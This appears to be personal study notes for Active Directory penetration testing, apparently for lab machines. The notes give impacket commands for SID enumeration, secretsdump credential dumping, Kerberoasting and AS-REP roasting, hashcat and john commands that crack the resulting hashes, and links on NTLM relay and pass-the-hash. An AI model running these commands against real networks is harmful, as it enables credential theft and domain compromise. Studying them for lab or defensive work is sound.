# Windows Fundamentals ## Tools #### enum4linux > https://github.com/CiscoCXSecurity/enum4linux #### impacket >https://github.com/SecureAuthCorp/impacket --- ## Commands ```python= python3 lookupsid.py 'megabank/melanie:Welcome123!@10.10.10.169' python3 secretsdump.py 'megabank/melanie:Welcome123!@10.10.10.169' python3 samrdump.py 'cyber/Administrator:P@ssw0rd@10.0.0.1' python3 GetUserSPNs.py -request -dc-ip 10.0.0.1 'cyber.com/Administrator:P@ssw0rd' hashcat -m 13100 getuserspns.txt /usr/share/wordlists/rockyou.txt --force john -format=krb5tgs getuserspns.txt --wordlist=/usr/share/wordlists/rockyou.txt python3 GetNPUsers.py cyber.com/ -usersfile ~/Downloads/users.txt -no-pass -dc-ip 10.0.0.1 hashcat -m 18200 getnpusers.txt -a 3 /usr/share/wordlists/rockyou.txt ``` --- ## Links #### NTLM Relay >https://en.hackndo.com/ntlm-relay/ #### Kerberos >https://en.hackndo.com/kerberos/ #### Mitm6 >https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/ #### Bloodhound >https://en.hackndo.com/bloodhound/ #### SPN >https://en.hackndo.com/service-principal-name-spn/ #### AS_Rep Roasting >https://en.hackndo.com/kerberos-asrep-roasting/ #### Kerberoasting >https://en.hackndo.com/kerberoasting/ #### Pass-the-Hash >https://en.hackndo.com/pass-the-hash/